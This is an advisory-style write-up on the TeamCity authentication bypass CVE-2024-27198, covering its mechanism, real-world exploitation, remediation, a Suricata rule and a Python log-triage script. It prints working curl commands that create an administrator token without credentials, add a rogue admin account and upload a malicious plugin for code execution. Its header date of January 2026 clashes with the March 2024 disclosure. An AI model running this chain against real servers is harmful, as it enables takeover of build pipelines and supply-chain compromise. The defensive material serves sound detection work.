
CVE-2024-27198: JetBrains TeamCity — Authentication Bypass to RCE

CVE Details

CVE ID: CVE-2024-27198
CVSS Score: 9.8
Severity: Critical
Vendor: JetBrains
Product: TeamCity
Patch Status: Available
Published: January 17, 2026

Background

JetBrains TeamCity is a widely deployed CI/CD (Continuous Integration/Continuous Deployment) server used by software development teams to automate build, test, and deployment pipelines. It is used by thousands of organisations, from small software companies to large enterprises and government agencies. TeamCity's position in the software development lifecycle makes it an exceptionally high-value target: whoever controls the CI/CD server can inject code into the artifacts it builds, alter pipelines, and read the source repositories and deployment credentials the server is trusted with.

CVE-2024-27198 is a critical authentication bypass discovered by Stephen Fewer of Rapid7 and disclosed, together with the fix, on March 4, 2024. It was published alongside a second, lower-severity flaw in the same component (CVE-2024-27199, a path traversal that gives unauthenticated access to a small number of settings endpoints); the two were fixed together but the bypass alone is sufficient for full compromise. Public exploit code followed within hours and opportunistic exploitation of exposed servers within days. Note that the widely reported nation-state activity against TeamCity (Russia's SVR, tracked as APT29/Cozy Bear, and North Korea's DIAMOND SLEET) targeted the earlier flaw CVE-2023-42793 in late 2023, not this CVE; see Real-World Exploitation Evidence below.

Technical Mechanism

CVE-2024-27198 is an authentication bypass in TeamCity's web application (served by the bundled Tomcat). It is not a path traversal but an alternative-path flaw (CWE-288): a request that should be rejected reaches a protected handler through a code path that the authentication layer does not cover.

TeamCity's authentication interceptor decides per request whether credentials are required; a small set of paths (the login page, static resources and similar) is reachable anonymously, and a request for a path the server does not know at all is handed to the controller, which prepares a 404 response rather than a login redirect. That 404 handling in the server's base controller is where the flaw lives. When a request produces a 404 and carries a jsp query parameter, the controller checks only that the parameter value ends with ".jsp" and then forwards the request internally to that value using the servlet RequestDispatcher. Two properties of the servlet container turn this into a bypass: the forward is dispatched inside the server, so TeamCity's authentication checks are not applied again to the forwarded request, and any path parameter (the part of a path segment after a semicolon) is stripped before the forward target is resolved.

Specifically, the protected target is:

/app/rest/users/id:1/tokens/RPC2

This REST endpoint creates an access token (here named RPC2) for user id 1, which on most installations is the first administrator. Requested directly it requires authentication. A request such as:

POST /hax?jsp=/app/rest/users/id:1/tokens/RPC2;.jsp

satisfies all three conditions: /hax does not exist (404), the jsp parameter is present, and its value ends with ".jsp". The controller forwards to the value, the container discards the ";.jsp" path parameter, and the REST handler receives an unauthenticated request for /app/rest/users/id:1/tokens/RPC2 and answers it with a freshly created token. The discrepancy between the string the suffix check inspects and the path the forward actually resolves to is the core of the bypass. The /hax path is arbitrary (any non-existent path works), any HTTP method is forwarded, and any REST endpoint can be the target. A harmless way to confirm exposure on a server you own is GET /hax?jsp=/app/rest/server;.jsp: a patched server answers 404, a vulnerable one returns the server information document.

Once an attacker creates an admin token via this bypass:

# Step 1: create an access token for user id 1 (usually the first admin)
# without any credentials. The token value is returned in the response
# body (XML by default; add -H "Accept: application/json" for JSON).
curl -X POST "https://teamcity.example.com/hax?jsp=/app/rest/users/id:1/tokens/RPC2;.jsp"

# Step 2: use the token as a Bearer credential to create a new user with
# the SYSTEM_ADMIN role in global scope ("g")
curl -X POST "https://teamcity.example.com/app/rest/users" \
  -H "Authorization: Bearer <obtained_token>" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"P@ss!","email":"a@b.com","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'

# Step 3: upload a server plugin; plugins are Java code loaded into the
# server JVM, so this is code execution as the TeamCity service account
curl -X POST "https://teamcity.example.com/admin/pluginUpload.html" \
  -H "Authorization: Bearer <obtained_token>" \
  -F "file=@malicious_plugin.zip"

TeamCity plugins execute arbitrary Java code in the server's JVM context, granting full RCE. Step 2 is optional: the token from step 1 already carries the administrator's permissions, and an attacker who wants to stay quiet can use it directly rather than create an account that shows up in the user list. Defenders should therefore audit access tokens on existing administrators, not only new accounts.
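To make the mismatch between the suffix check and the resolved route concrete, here is an added model of the forward logic (example code written for this page, not TeamCity's source). The routes in KNOWN_PREFIXES and the function names are assumptions; the jsp value is taken as already percent-decoded, as a servlet getParameter() value would be. The hardened variant validates the resolved target instead of the raw string and illustrates the principle only; it is not JetBrains' actual patch.

```python
"""Model of the CVE-2024-27198 forward logic (added example, not TeamCity code)."""
from typing import Optional

# Routes the modelled server knows (assumption); any other path is a 404
# and reaches the jsp forward handler. The real server has many more routes.
KNOWN_PREFIXES = ("/app/rest/", "/admin/", "/login.html", "/overview.html")


def strip_path_params(path: str) -> str:
    """Servlet containers drop path parameters (';name=value' or just ';x')
    from every segment before resolving a path, so '/a;x/b;.jsp' -> '/a/b'."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def is_not_found(request_path: str) -> bool:
    """True when the request would produce a 404 in the modelled server."""
    return not strip_path_params(request_path).startswith(KNOWN_PREFIXES)


def vulnerable_forward(request_path: str, jsp: Optional[str]) -> Optional[str]:
    """Flawed 404 handler: validates the raw jsp string, forwards the raw
    string, and the container resolves it with the path parameter removed.
    The forward is internal, so the authentication interceptor that guards
    incoming requests never sees it. Returns the path the REST layer actually
    receives, or None when no forward happens."""
    if not is_not_found(request_path) or jsp is None or not jsp.endswith(".jsp"):
        return None
    return strip_path_params(jsp)


def hardened_forward(request_path: str, jsp: Optional[str]) -> Optional[str]:
    """Validate the resolved target, not the raw string: strip path parameters
    first, then require an absolute .jsp view with no traversal segment that
    does not sit under an API or admin route. Illustration of the principle;
    not JetBrains' patch."""
    if not is_not_found(request_path) or jsp is None:
        return None
    resolved = strip_path_params(jsp)
    if ".." in resolved.split("/") or not resolved.endswith(".jsp"):
        return None
    if not resolved.startswith("/") or resolved.startswith(("/app/", "/admin/")):
        return None
    return resolved


if __name__ == "__main__":
    probe = "/app/rest/server;.jsp"  # the harmless exposure check from the text
    print("vulnerable:", vulnerable_forward("/hax", probe))  # /app/rest/server
    print("hardened  :", hardened_forward("/hax", probe))    # None
```

The same probe shows both halves of the bug: vulnerable_forward returns the REST path because the check ran on "...;.jsp" while the container routed "/app/rest/server"; hardened_forward rejects it because, once the path parameter is gone, the target is not a JSP at all. A fix that only tightens the suffix check would still be fooled by anything the container normalises after the check runs.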

Real-World Exploitation Evidence

Rapid7 published full technical details and a working Metasploit module on March 4, 2024, the same day JetBrains published its advisory, so the window between patch availability and public exploit was effectively zero. Scanning and exploitation of internet-facing servers followed within hours: LeakIX reported roughly 1,700 exposed instances, the majority of which were showing attacker-created user accounts within days, and CISA added the CVE to its Known Exploited Vulnerabilities catalogue on March 7, 2024.

Criminal actors:

  • Ransomware affiliates used the bypass for initial access; GuidePoint Security documented BianLian intrusions that began with CVE-2024-27198.
  • Trend Micro observed exploited servers being used to deploy Jasmin ransomware, the XMRig cryptominer and SparkRAT.
  • Initial access brokers sold access to compromised instances, and rogue administrator accounts appeared on exposed servers at scale.

Nation-state activity (against the earlier TeamCity flaw):

  • The widely reported state-sponsored TeamCity campaigns exploited CVE-2023-42793, the September 2023 authentication bypass, not this CVE.
  • In October 2023 Microsoft attributed exploitation of CVE-2023-42793 to the North Korean actors DIAMOND SLEET (Lazarus) and ONYX SLEET, which deployed backdoors and harvested credentials from build environments.
  • In December 2023 CISA, FBI, NSA and international partners warned that Russia's SVR (APT29 / Cozy Bear) had been exploiting CVE-2023-42793 since September 2023, with the same supply chain intent seen in the SolarWinds intrusion disclosed in 2020: access to build servers as a route into the software those servers produce.
  • Those actors are exactly the audience for CVE-2024-27198, and their post-exploitation tradecraft (persistent access via legitimate-looking admin accounts, modified build configurations, credential theft from pipelines) should be assumed here too.

Impact Assessment

Compromising a TeamCity server has cascading downstream effects:

  • Supply chain attack surface: Build pipelines can be modified to inject malicious code into compiled software artifacts before they reach customers.
  • Source code theft: TeamCity has read access to all connected repositories; attackers can exfiltrate proprietary codebases.
  • Credential harvesting: Build pipelines store credentials for deployment targets, cloud providers, package registries, and test environments — all accessible via the compromised TeamCity instance.
  • Downstream system access: TeamCity is typically authorised to deploy to production environments; attackers inherit this access.
  • Artifact tampering: Software packages signed and distributed from a compromised build pipeline are trusted by downstream consumers.

Affected Versions

Product                 Affected Versions                              Fixed Version
TeamCity On-Premises    All versions up to and including 2023.11.3     2023.11.4
TeamCity Cloud          Patched by JetBrains                           N/A (auto-updated)

The vulnerability affects all TeamCity On-Premises installations regardless of operating system (Windows, Linux, macOS). TeamCity Cloud was patched automatically.

Remediation Steps

  1. Upgrade to TeamCity 2023.11.4 or later. This is the only complete fix. JetBrains also released a security patch plugin for older versions.

  2. Apply the security patch plugin if an immediate upgrade is not possible. JetBrains published a standalone .zip plugin that patches the vulnerability without a full upgrade:

     • Download it from the JetBrains security advisory page
     • Install it via Administration > Plugins > Upload plugin zip

  3. Review administrator accounts and access tokens. After patching, audit all administrator accounts against your last known-good state, and list the access tokens on each existing administrator: the bypass creates a token on user id:1 without creating any new account, so a clean user list does not mean a clean server.

     # Via the TeamCity REST API
     curl "https://teamcity.example.com/app/rest/users?locator=role:SYSTEM_ADMIN" \
       -H "Authorization: Bearer <your_token>"
     curl "https://teamcity.example.com/app/rest/users/id:1/tokens" \
       -H "Authorization: Bearer <your_token>"

     Delete any token you did not issue. RPC2 is the name used in the public exploit, but attackers can choose any name.

  4. Review build configurations for tampering. Check all build step configurations for unexpected script additions or modified artifact publishing steps, and compare against versioned settings or backups where available.

  5. Rotate all secrets stored in TeamCity. Treat all credentials, tokens, and certificates stored in TeamCity (project parameters, VCS roots, cloud profiles, artifact storage and agent authorization tokens) as compromised.

  6. Restrict network access. Ensure the TeamCity web UI is not internet-accessible; place it behind a VPN or IP allowlist.

Detection Guidance

Log sources:

  • TeamCity teamcity-server.log and teamcity-access.log (in <TeamCity home directory>/logs/, not the data directory)
  • System logs for unexpected process execution
  • Active Directory / LDAP audit logs for account changes

Suspicious patterns in access logs (the jsp parameter need not be the first in the query string, the request path need not be /hax, and ";" may appear percent-encoded as %3B):

jsp=.*;\.jsp
jsp=/app/rest/
POST /app/rest/users.*tokens
POST /app/rest/users
POST /admin/pluginUpload.html

Indicators of Compromise:

  • Unexpected administrator accounts created after a specific date
  • Access tokens on existing administrator accounts that nobody issued (list them via /app/rest/users/id:1/tokens and the equivalent for every other admin)
  • New or modified plugins in <TeamCity data dir>/plugins/
  • Build configurations modified without change records
  • Unusual outbound connections from the TeamCity service account

Suricata signature. It matches the jsp parameter wherever it sits in the query string and the ";.jsp" path parameter that distinguishes the bypass from a legitimate JSP forward; a rule keyed only on "?jsp=" followed by "/app/rest/" misses a request such as /hax?a=1&jsp=/app/rest/server;.jsp. Note that a network sensor only sees this if TeamCity's TLS is terminated in front of it; otherwise the access log is the authoritative source.

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"TeamCity CVE-2024-27198 Auth Bypass (jsp forward with path parameter)"; flow:established,to_server; http.uri; content:"jsp="; content:"|3b|.jsp"; distance:0; classtype:web-application-attack; sid:9000027; rev:2;)
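The patterns above applied to a log, as an added example (not TeamCity tooling). The log lines are constructed in combined-log style; the field layout of teamcity-access.log may differ, so the REQUEST_RE expression is an assumption to adapt. The scanner decodes the query string itself, so the fourth line (jsp not the first parameter, ";" encoded as %3B) is caught even though a literal "?jsp=" match would not see it, and it resolves the forward target so the token creation is attributed to the bypass request rather than missed because the request path was /hax.

```python
"""Access-log triage for the CVE-2024-27198 chain (added example, not TeamCity tooling)."""
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample in combined-log style. Lines 1-4 mimic the bypass and
# the follow-on steps; lines 5-6 are benign administrator traffic.
ACCESS_LOG = """\
203.0.113.7 - - [05/Mar/2024:10:22:33 +0000] "POST /hax?jsp=/app/rest/users/id:1/tokens/RPC2;.jsp HTTP/1.1" 200 412
203.0.113.7 - - [05/Mar/2024:10:22:35 +0000] "POST /app/rest/users HTTP/1.1" 200 880
203.0.113.7 - - [05/Mar/2024:10:22:40 +0000] "POST /admin/pluginUpload.html HTTP/1.1" 200 0
198.51.100.2 - - [05/Mar/2024:10:25:01 +0000] "GET /hax?a=1&jsp=/app/rest/server%3B.jsp HTTP/1.1" 200 2100
10.0.0.12 - admin [05/Mar/2024:10:30:00 +0000] "GET /overview.html HTTP/1.1" 200 19322
10.0.0.12 - admin [05/Mar/2024:10:31:10 +0000] "GET /app/rest/users?locator=role:SYSTEM_ADMIN HTTP/1.1" 200 1544
"""

# Assumed layout: "<METHOD> <URI> HTTP/x.y" <status>; adjust to your log format.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def strip_path_params(path: str) -> str:
    """Drop ';...' path parameters from each segment, as the servlet container does."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def parse_query(query: str) -> dict:
    """Decode the query string ourselves so a jsp value hidden behind other
    parameters or percent-encoding (e.g. %3B for ';') is still seen."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), unquote(value))
    return params


def classify(line: str, line_no: int) -> Optional[dict]:
    """Return a finding record for a suspicious request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    method, uri, status = m["method"], m["uri"], int(m["status"])
    raw_path, _, query = uri.partition("?")
    path = strip_path_params(unquote(raw_path))
    params = parse_query(query)
    findings = []

    jsp = params.get("jsp")
    if jsp is not None:
        target = strip_path_params(jsp)
        # A path parameter inside the forward target, or a target under the
        # REST API, has no legitimate use: flag it regardless of method or
        # status, and regardless of which non-existent path stood in for /hax.
        if target != jsp or target.startswith("/app/rest/"):
            findings.append("jsp-forward-bypass")
            path = target  # the handler the server actually executed

    if method == "POST":
        if path.startswith("/app/rest/users") and "/tokens" in path:
            findings.append("token-created")
        elif path == "/app/rest/users":
            findings.append("user-created")
        elif path == "/admin/pluginUpload.html":
            findings.append("plugin-upload")

    if not findings:
        return None
    return {"line": line_no, "method": method, "status": status,
            "effective_path": path, "findings": findings}


def scan(lines) -> list:
    """One record per suspicious request, in log order."""
    hits = (classify(line, n) for n, line in enumerate(lines, start=1))
    return [h for h in hits if h]


if __name__ == "__main__":
    for hit in scan(ACCESS_LOG.splitlines()):
        print(f"line {hit['line']}: {hit['method']} {hit['effective_path']} "
              f"-> {hit['status']} {', '.join(hit['findings'])}")
```

Read the status with the finding: a jsp-forward-bypass request answered 200 succeeded, one answered 404 hit a patched server (or the plugin) and is an attempt only. user-created and plugin-upload also occur during legitimate administration, so reconcile those hits against change records and the source address; jsp-forward-bypass has no benign explanation.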

Timeline

Date                 Event
December 13, 2023    CISA, FBI, NSA and international partners publish a joint advisory on SVR exploitation of the earlier TeamCity flaw CVE-2023-42793 (context for the state-actor reporting above)
February 2024        Rapid7 (Stephen Fewer) discovers the vulnerability and reports it to JetBrains
March 4, 2024        JetBrains publishes its security advisory for TeamCity 2023.11.4 and the security patch plugin; Rapid7 publishes full technical details and a Metasploit module
March 4–5, 2024      Mass scanning and exploitation of exposed instances begin; public PoCs circulate within hours
March 7, 2024        CISA adds CVE-2024-27198 to the Known Exploited Vulnerabilities catalogue
March 2024           GuidePoint Security and Trend Micro report ransomware, cryptominer and RAT deployment through exploited servers